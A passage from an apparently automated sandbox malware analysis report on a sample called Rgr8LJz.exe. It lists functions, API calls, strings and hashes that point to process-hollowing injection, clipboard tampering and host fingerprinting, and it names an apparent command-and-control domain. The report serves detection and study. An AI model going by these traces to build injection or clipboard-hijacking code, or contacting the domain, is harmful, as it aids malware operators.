WriteProcessMemory.KERNELBASE(00000090,00000000,?,?,00000000,?), ref: 03088191
WriteProcessMemory.KERNELBASE(00000090,00400000,?,?,00000000,?,00000028), ref: 030881DC
WriteProcessMemory.KERNELBASE(00000090,?,?,00000004,00000000), ref: 0308821A
Wow64SetThreadContext.KERNEL32(00000098,05500000), ref: 03088256
ResumeThread.KERNELBASE(00000098), ref: 03088265

Strings

TerminateProcess, xrefs: 03088148

Memory Dump Source

Source File: 00000000.00000002.1810594704.0000000003087000.00000040.00000800.00020000.00000000.sdmp, Offset: 03087000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3087000_Rgr8LJz.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: TerminateProcess
API String ID: 2440066154-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: b321e74bd03611de2536bc864f555cb4a1eb9e615deec2580f6bc990c1e076d0
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 0E312D72240646ABDB74DF54CC91FEA73A5BFC8B15F148508EB19AF281C6B4BA018B94

Function 015327E8 Relevance: 1.8, APIs: 1, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(04083588,?,?,?), ref: 01532AE9

Memory Dump Source

Source File: 00000000.00000002.1810403789.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Rgr8LJz.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5807a53b1c714a7fb1ca9eea54d9fdf8a91d5e6f9cb21a1f30e02614d4e4e04a
Instruction ID: ace9a63b303bb1122ff2bc7f821fe8486117526ee9650a3cc277112004238b7c
Opcode Fuzzy Hash: 5807a53b1c714a7fb1ca9eea54d9fdf8a91d5e6f9cb21a1f30e02614d4e4e04a
Instruction Fuzzy Hash: D8B140719046599FCB15CFA9D480ADDFFF1BF88310F28C559E458AB252C370AC82CBA4

Function 01530668 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(04083588,?,?,?), ref: 01532AE9

Memory Dump Source

Source File: 00000000.00000002.1810403789.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Rgr8LJz.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 76cb28a97686317118337c2d3e5075ed36cb014cb213d902e7afe5e502f986a6
Instruction ID: 860c3858458b6fc0f698d2f72920c5b5af69ad5fec64a675d6d54a81e85557da
Opcode Fuzzy Hash: 76cb28a97686317118337c2d3e5075ed36cb014cb213d902e7afe5e502f986a6
Instruction Fuzzy Hash: 9C21C2B5D01659AFCB10DF9AD884ADEFBF4FB48310F10852AE918A7240C3B5A954CFA5

Analysis Process: Rgr8LJz.exePID: 7352, Parent PID: 7276COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	57.5%
Total number of Nodes:	381
Total number of Limit Nodes:	26

Executed Functions

Function 00412CA0 Relevance: 112.3, APIs: 4, Strings: 59, Instructions: 2003COMMON

Download Yara Rule

Strings

9, xrefs: 0041371D
w, xrefs: 0041444D
4, xrefs: 00413621
4, xrefs: 00412F8D
~, xrefs: 004137AB
Q, xrefs: 00412D09
{, xrefs: 00413727
2, xrefs: 004135F1
m, xrefs: 0041438D
:, xrefs: 00413631
!, xrefs: 004132DA
", xrefs: 00414729
0, xrefs: 00413601
|, xrefs: 0041441D
A, xrefs: 00413DB0
{, xrefs: 0041300B
:, xrefs: 00414759
A, xrefs: 004143ED
2, xrefs: 0041443D
^, xrefs: 0041439D
S, xrefs: 0041433D
Q, xrefs: 0041434D
J, xrefs: 00414079
', xrefs: 0041446D
:, xrefs: 00413722
+, xrefs: 004133F8
H, xrefs: 004135C1
4, xrefs: 00414769
H, xrefs: 0041321C
V, xrefs: 004143FD
), xrefs: 0041442D
6, xrefs: 00413611
5, xrefs: 00413629
,, xrefs: 00412EC1
R, xrefs: 00413010
D, xrefs: 00414866
F, xrefs: 00412F92
Q, xrefs: 00412EB9
L, xrefs: 0041432D
^, xrefs: 004143AD
#, xrefs: 0041445D
L, xrefs: 004135E1
t, xrefs: 00413098
X, xrefs: 00413DA8
`, xrefs: 00413C98
z, xrefs: 004143DD
B, xrefs: 0041440D
N, xrefs: 004135D1
l, xrefs: 0041313E
5, xrefs: 004146D9
T, xrefs: 00413E26
9, xrefs: 00414739
D, xrefs: 00414AF4
[, xrefs: 004143CD
#, xrefs: 004137B0
E, xrefs: 00412DC0
G, xrefs: 0041406F
S, xrefs: 0041431D
B, xrefs: 0041437D

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: !$"$#$#$'$)$+$,$0$2$2$4$4$4$5$5$6$9$9$:$:$:$A$A$B$B$D$D$E$F$G$H$H$J$L$L$N$Q$Q$Q$R$S$S$T$V$X$[$^$^$`$l$m$t$w$z${${$|$~
API String ID: 0-2065924799
Opcode ID: 07f31485be5ce7e3879ce1d24413800d265964071caaf7dab46345aeb3000cc1
Instruction ID: b5d01ec0a5d2d91fb592b268d7ff7dbe50f9c4c35ecfbef1f80fb9eef82dbdb3
Opcode Fuzzy Hash: 07f31485be5ce7e3879ce1d24413800d265964071caaf7dab46345aeb3000cc1
Instruction Fuzzy Hash: 3003CF7150C7C08AD3359B3884443DFBBD1ABD6324F188A6EE4E9873D2D6788986C75B

Function 0043CF10 Relevance: 28.8, APIs: 12, Strings: 4, Instructions: 802
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,1E191816,?,13121118,?), ref: 0043D019
CoCreateInstance.OLE32(?,00000000,00000001,13121118,00000000), ref: 0043D27B
SysAllocString.OLEAUT32 ref: 0043D303
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D341
SysAllocString.OLEAUT32 ref: 0043D396
SysAllocString.OLEAUT32 ref: 0043D461
VariantInit.OLEAUT32(?), ref: 0043D4D0

Strings

PV, xrefs: 0043D3F5
\], xrefs: 0043D2B2
Ac6, xrefs: 0043D148
WT, xrefs: 0043D3FD

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: AllocString$BlanketCreateEnvironmentExpandInitInstanceProxyStringsVariant
String ID: WT$\]$Ac6$PV
API String ID: 1094070830-1331780231
Opcode ID: ecc98f6968d541883936cce5765017312db2aa1324a18d9350f0521d194ac335
Instruction ID: b07b600703234581da8331ebef50768a1361332a674515d50559b63b0857902b
Opcode Fuzzy Hash: ecc98f6968d541883936cce5765017312db2aa1324a18d9350f0521d194ac335
Instruction Fuzzy Hash: D742FF71A083408BE314CF29D84176BBBE5EFDA314F14992EE5D98B391D738D806CB96

Function 032C1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 032C1032
OpenClipboard.USER32(00000000), ref: 032C103C
GetClipboardData.USER32(0000000D), ref: 032C104C
GlobalLock.KERNEL32(00000000), ref: 032C105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 032C1090
GlobalLock.KERNEL32 ref: 032C10A0
GlobalUnlock.KERNEL32 ref: 032C10C1
EmptyClipboard.USER32 ref: 032C10CB
SetClipboardData.USER32(0000000D), ref: 032C10D6
GlobalFree.KERNEL32 ref: 032C10E3
GlobalUnlock.KERNEL32(?), ref: 032C10ED
CloseClipboard.USER32 ref: 032C10F3
GetClipboardSequenceNumber.USER32 ref: 032C10F9

Memory Dump Source

Source File: 00000003.00000002.2891045872.00000000032C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true

Associated: 00000003.00000002.2891032887.00000000032C0000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2891058533.00000000032C2000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32c0000_Rgr8LJz.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: 1cd810c0ab49da1168b703fe731ae91e7732af04c7efd1917c72be1ae454fe0f
Instruction ID: 1fd3d424775adaeca3cab51a96ecc98472fdae0147605ac580cfb9b0c91fb8a7
Opcode Fuzzy Hash: 1cd810c0ab49da1168b703fe731ae91e7732af04c7efd1917c72be1ae454fe0f
Instruction Fuzzy Hash: B7219231634391DBDB207B72BC0EB6ABBA8EF44641F08892CFD49D7156EE619850C6A1

Function 00425828 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNEL32 ref: 00425996

Strings

*D, xrefs: 00425A4B
?PqV, xrefs: 004258CD
H,LR, xrefs: 004258C6
?PqV, xrefs: 0042596F, 00425AD2
B H&, xrefs: 004258B1
K$Y*, xrefs: 004258B8
7X=^, xrefs: 004258DB
BE, xrefs: 00425A52

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: DrivesLogical
String ID: *D$7X=^$?PqV$?PqV$B H&$BE$H,LR$K$Y*
API String ID: 999431828-2756550523
Opcode ID: 14dacf30ba38af46e305f089da7e1887cc1531eb416a009de3a4298b9ed7f68b
Instruction ID: d5cf561d35cff93e483afb5ae68fe50853965668c857624132320819439bc2eb
Opcode Fuzzy Hash: 14dacf30ba38af46e305f089da7e1887cc1531eb416a009de3a4298b9ed7f68b
Instruction Fuzzy Hash: 9AA120B4A00706CFDB20CF65D981266BBB1FF06314B5486ACC5955F352D33AE892CF89

Function 0040D0FF Relevance: 15.6, APIs: 2, Strings: 8, Instructions: 643
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040D10B
CoUninitialize.COMBASE ref: 0040D55C

Strings

0A;C, xrefs: 0040D916
VT, xrefs: 0040D80F
yD, xrefs: 0040D1CF, 0040D61E
cureprouderio.click, xrefs: 0040D541, 0040D9A1
RP, xrefs: 0040D81A
;, xrefs: 0040D671
DE, xrefs: 0040D91E
sM/O, xrefs: 0040D4E0, 0040D536

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: 0A;C$;$DE$cureprouderio.click$sM/O$RP$VT$yD
API String ID: 3861434553-2271419232
Opcode ID: 9e63b216cdd3117f5481638eb4927bb1ea99902ae2fa12966c0ef08083db51e7
Instruction ID: 780f6a63e598258144c0d25abc1c0488f3045605cde384e5134ff1b3cc461c5b
Opcode Fuzzy Hash: 9e63b216cdd3117f5481638eb4927bb1ea99902ae2fa12966c0ef08083db51e7
Instruction Fuzzy Hash: 80221F7150C3D18AD334CF698490BABBFE1AFD2304F18596DD8C96B392C7784909CB9A

Function 00418BDB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t, xrefs: 00418C94
##/", xrefs: 00418C7F

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: ##/"$t
API String ID: 0-3548641930
Opcode ID: ab515ab584c6b2845cb540098802a799b05b23de4e15ccbb6b331cb417b0a08d
Instruction ID: 8cd9bc221cb41f9bc9b644c7b9a87fff4d9fe85918b21c149a17c33a8cfa963b
Opcode Fuzzy Hash: ab515ab584c6b2845cb540098802a799b05b23de4e15ccbb6b331cb417b0a08d
Instruction Fuzzy Hash: 7AB1E4B59083418FD720CF28C8517EBB7E1EF95318F04892EE4D987391EB389955CB9A

Function 0043852B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00438579
GetSystemMetrics.USER32 ref: 00438588

Strings

, xrefs: 0043865C

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: acac29dd8fa7a0ed96e3bc21e2e05ace19c3e4db40f792a02896936ebec17fb6
Instruction ID: 7e1d9ab79e6b8370f79b9977d0918f2774eabe04c3e1f6c3707a952fd1576785
Opcode Fuzzy Hash: acac29dd8fa7a0ed96e3bc21e2e05ace19c3e4db40f792a02896936ebec17fb6
Instruction Fuzzy Hash: BE5193B4E142099FDB40EFACD981A9DBBF0BB89300F01852DE858E7350D734A949CF96

Function 0041732D Relevance: 4.1, Strings: 3, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Wwjm, xrefs: 0041873B
o, xrefs: 0041863E
Fwjm, xrefs: 004186FA

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: Fwjm$Wwjm$o
API String ID: 0-2595654037
Opcode ID: 87d03a395f42bf77ec8d4d7930f137e171d8590222935794b605d4523dc0792a
Instruction ID: 73185ca8ff9e508cf168c9d863a4a83fbb69ea1c606c7308a8cabe7c408f9bac
Opcode Fuzzy Hash: 87d03a395f42bf77ec8d4d7930f137e171d8590222935794b605d4523dc0792a
Instruction Fuzzy Hash: EED102769083519BD725DF24C8417EB77E1FF99304F08892EE8C987352EB389852CB96

Function 00442191 Relevance: 3.9, Strings: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0044224C
LfE, xrefs: 004421C3
?89>, xrefs: 004422CE, 00442300

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ?89>$@$LfE
API String ID: 2994545307-709521354
Opcode ID: 4b26f70a73b239fee5bcab43da0367ca85753b293acf10dd19c56a9a7d56845c
Instruction ID: aa3de3707eac26371d1eaa4d1f2499ffaa8e48c7399d981ac3f40147feb89c11
Opcode Fuzzy Hash: 4b26f70a73b239fee5bcab43da0367ca85753b293acf10dd19c56a9a7d56845c
Instruction Fuzzy Hash: 04413676D001158BEB28CF64CD417BEB772FF90318F59822AE955773A4DBB81D068788

Function 004308DA Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00430A15

Strings

ZnYa, xrefs: 00430B9A

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: ZnYa
API String ID: 3960555810-2524012835
Opcode ID: e01d5f822334d79d6dbf2511618dd83664476b45f21aae94fd51b912a2c8e835
Instruction ID: b4373c96979e8983be22c356767cdf1baa72198f2e4120c683f1e19834b13d9a
Opcode Fuzzy Hash: e01d5f822334d79d6dbf2511618dd83664476b45f21aae94fd51b912a2c8e835
Instruction Fuzzy Hash: 73A18E7051C3C18ED729CF2A846076BBFE1AF9B304F18999EE0D587382D77A8505CB56

Function 0043056F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 327COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00430A15

Strings

ZnYa, xrefs: 00430B9A

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: ZnYa
API String ID: 3960555810-2524012835
Opcode ID: 9f20b80aaa134fbbd64096c6298991c186044edab2f3a6f9810bd326f139a167
Instruction ID: d43a3c09b8b07e6c31f5b04de07628c4e1d9670ed90338f990cc3c50ab421f1f
Opcode Fuzzy Hash: 9f20b80aaa134fbbd64096c6298991c186044edab2f3a6f9810bd326f139a167
Instruction Fuzzy Hash: 01917EB051C3818FD729CF29846076BBFE1AF9B304F18999EE0D587382D77A8505CB56

Function 00411296 Relevance: 2.5, APIs: 1, Instructions: 1019COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d4029de869a9c9d4a43bcc92cc6ea213046f7e3ab5fc251db669677b93832b
Instruction ID: 88c076ec8877858c62bc7eee21d21539596b41495842214225fe9bb94136f9fd
Opcode Fuzzy Hash: 67d4029de869a9c9d4a43bcc92cc6ea213046f7e3ab5fc251db669677b93832b
Instruction Fuzzy Hash: 2A820CB2604B408FD714DF38C881396BBE2AB95314F188A7DD5EAC73D2D679E446C706

Function 00411FB1 Relevance: 2.1, APIs: 1, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da5952b71dd58f9e6aafed4045930bc6df872e45c148b5bb7162c4aa8fb37b2
Instruction ID: 7882ab89d2c11eb40520c0fe5a7a760f5caa1c4a3d6ca933d45a42c9a561baf3
Opcode Fuzzy Hash: 5da5952b71dd58f9e6aafed4045930bc6df872e45c148b5bb7162c4aa8fb37b2
Instruction Fuzzy Hash: 743205B5604B408FC714DF38C5913AABBE1AB56314F188A3ED4EBC73D2E679A445CB06

Function 00443EA0 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

;89>, xrefs: 00443ED0

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ;89>
API String ID: 2994545307-3824387205
Opcode ID: 2f5154e04737633b021bbe76bd23af42cd0cae2360f9ac30a5b51f68ea49b5a7
Instruction ID: f08cce47ab4bc3ecec8ea376cd0217e678d39a29e5eefd450400d4b923d59937
Opcode Fuzzy Hash: 2f5154e04737633b021bbe76bd23af42cd0cae2360f9ac30a5b51f68ea49b5a7
Instruction Fuzzy Hash: D89138316083018BE718DF28C891A6FB7E2EFD5354F19C52DE4964B3A1DB389C468796

Function 00444780 Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

]Z[X, xrefs: 004447ED

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ]Z[X
API String ID: 2994545307-1173880412
Opcode ID: 88a50a69d3c1d250fcbec08f7e8d3a205e08e6b9fc0d7530145805d796f3cb0a
Instruction ID: 6d55546dda68a703805d234b3c7441de410caf6055a039201757560063eeeca6
Opcode Fuzzy Hash: 88a50a69d3c1d250fcbec08f7e8d3a205e08e6b9fc0d7530145805d796f3cb0a
Instruction Fuzzy Hash: 758146716083004BE718CF69D88076BB7E3FBC5324F19CA2EE99557391DB399C06879A

Function 00441A80 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00444D60,00000002,00000018,?,?,00000018,?,?,?), ref: 00441AAE

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00428970 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fde0f02df0dd4374103bd1d20dd5847e7a3791cb5387d42015b8610edf05ae84
Instruction ID: a0935fde067419d57e6ba7eda33ef2129cbcb08c0bb5969f1d43aca1acc7a9f7
Opcode Fuzzy Hash: fde0f02df0dd4374103bd1d20dd5847e7a3791cb5387d42015b8610edf05ae84
Instruction Fuzzy Hash: DA817AB1F063208BD7109F25EC9173F7795AF91314F58863EF9855B382EA389C05879A

Function 00408980 Relevance: 7.6, APIs: 5, Instructions: 113
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004089A2
GetCurrentThreadId.KERNEL32 ref: 004089A8
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089B9
GetForegroundWindow.USER32 ref: 004089BF
ExitProcess.KERNEL32 ref: 00408AE3

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 3e8f77308f7f778e08fe907d2e2e24cd467b0da1ccb47245688ea202817cbaf3
Instruction ID: 0c2bb8ef6aca0bf31116dd96856aabca2990d24f28c70538aa997c833518809e
Opcode Fuzzy Hash: 3e8f77308f7f778e08fe907d2e2e24cd467b0da1ccb47245688ea202817cbaf3
Instruction Fuzzy Hash: AC317A71A002104FD324AF259D0775A3B869B82714F0A427EA891FB2D6DD7C48068B9E

Function 0042FB31 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042FB65
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042FC14

Strings

{xw~, xrefs: 0042FB8B

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: ComputerFreeLibraryName
String ID: {xw~
API String ID: 2904949787-274428515
Opcode ID: c67d357fb34777ad8277883a0159b46d1eadae45c53f39fc4a5b09c635f7868f
Instruction ID: ec1071f23b9747a3a8c08ad9bef31f132da825554d189a9a8575ccd9fbaae275
Opcode Fuzzy Hash: c67d357fb34777ad8277883a0159b46d1eadae45c53f39fc4a5b09c635f7868f
Instruction Fuzzy Hash: 0221F5646093914ADB288B36D8647BBBFE1ABA7301F9884BDD0C987392D73844098B16

Function 0042FB2F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042FB65
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042FC14

Strings

{xw~, xrefs: 0042FB8B

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: ComputerFreeLibraryName
String ID: {xw~
API String ID: 2904949787-274428515
Opcode ID: 6a1fe55471143853498592e89eb498cae703b7f5c6df0d0cb80886cee617274b
Instruction ID: cda1b630711f32e02760031f8f5505c100656d6864b1e85a0e80bf418292df9a
Opcode Fuzzy Hash: 6a1fe55471143853498592e89eb498cae703b7f5c6df0d0cb80886cee617274b
Instruction Fuzzy Hash: 7B1108796093914BDB288B35D8A57ABBFE1AB97301F98C47DD0C9C7352DB3884098B16

Function 0042FAE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042FC14

Strings

{xw~, xrefs: 0042FB8B

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID: {xw~
API String ID: 3545744682-274428515
Opcode ID: f3d6e681243fa1ea4e38786e90c45e17c2d7b901f5dece09e90d91d35b5a6c58
Instruction ID: 2ca11d2a4348126019a91e6d947f6f4615a32a1a5c035809a50434f368edc9af
